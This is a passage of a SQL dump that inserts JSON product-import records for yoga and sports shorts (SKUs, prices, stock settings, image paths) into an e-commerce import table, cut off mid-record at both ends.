integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"899\":{\"sku\":\"MSH06-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-34-Red\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(10, 'catalog_product', 'append', '{\"900\":{\"sku\":\"MSH06-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-36-Blue\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"901\":{\"sku\":\"MSH06-36-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-36-Gray\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-36-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Gray\"},\"902\":{\"sku\":\"MSH06-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short-36-Red\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"lono-yoga-short-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"903\":{\"sku\":\"MSH06\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Lono Yoga Short\",\"description\":\"<p>Some shorts are &ldquo;all-purpose,&rdquo; while the Lono Yoga Short has a single purpose: yoga. Soft, flexible outer material moves with your body, and a secure, integrated boxer brief liner gives you extra confidence as you push your physique to the outer limits.<\\/p>\\n<p>&bull; Dark gray shorts with mesh accents.<br \\/>&bull; Ultra flexible four-way stretch.<br \\/>&bull; Flatlock seams and waistband.<br \\/>&bull; Two pockets, phony fly.<br \\/>&bull; Nylon\\/Lycra outer, Polyester\\/Lycra inner.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer|Compression,material=Nylon|Polyester|Rayon,pattern=Solid,climate=All-weather|Indoor|Hot|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH06-32-Blue,size=32,color=Blue|sku=MSH06-32-Gray,size=32,color=Gray|sku=MSH06-32-Red,size=32,color=Red|sku=MSH06-33-Blue,size=33,color=Blue|sku=MSH06-33-Gray,size=33,color=Gray|sku=MSH06-33-Red,size=33,color=Red|sku=MSH06-34-Blue,size=34,color=Blue|sku=MSH06-34-Gray,size=34,color=Gray|sku=MSH06-34-Red,size=34,color=Red|sku=MSH06-36-Blue,size=36,color=Blue|sku=MSH06-36-Gray,size=36,color=Gray|sku=MSH06-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh06-gray_alt1.jpg,\\/m\\/s\\/msh06-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer|Compression\",\"material\":\"Nylon|Polyester|Rayon\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Hot|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"904\":{\"sku\":\"MSH07-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-32-Black\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"image\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh07-black_alt1.jpg,\\/m\\/s\\/msh07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"905\":{\"sku\":\"MSH07-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-32-Blue\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"35\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"rapha-sports-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"906\":{\"sku\":\"MSH07-32-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Rapha  Sports Short-32-Purple\",\"description\":\"<p>For those about to sweat, we support you with the Rapha Sports Short. The compression-fit liner surrounds your muscles with the stimulation they need to find your high gear, while moisture-wicking performance fabric helps prevents sweat build-up.<\\/p>\\n<p>&bull; Black shorts with royal accents.<br \\/>&bull; Compression liner. <br \\/>&bull; Inseam: 8\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 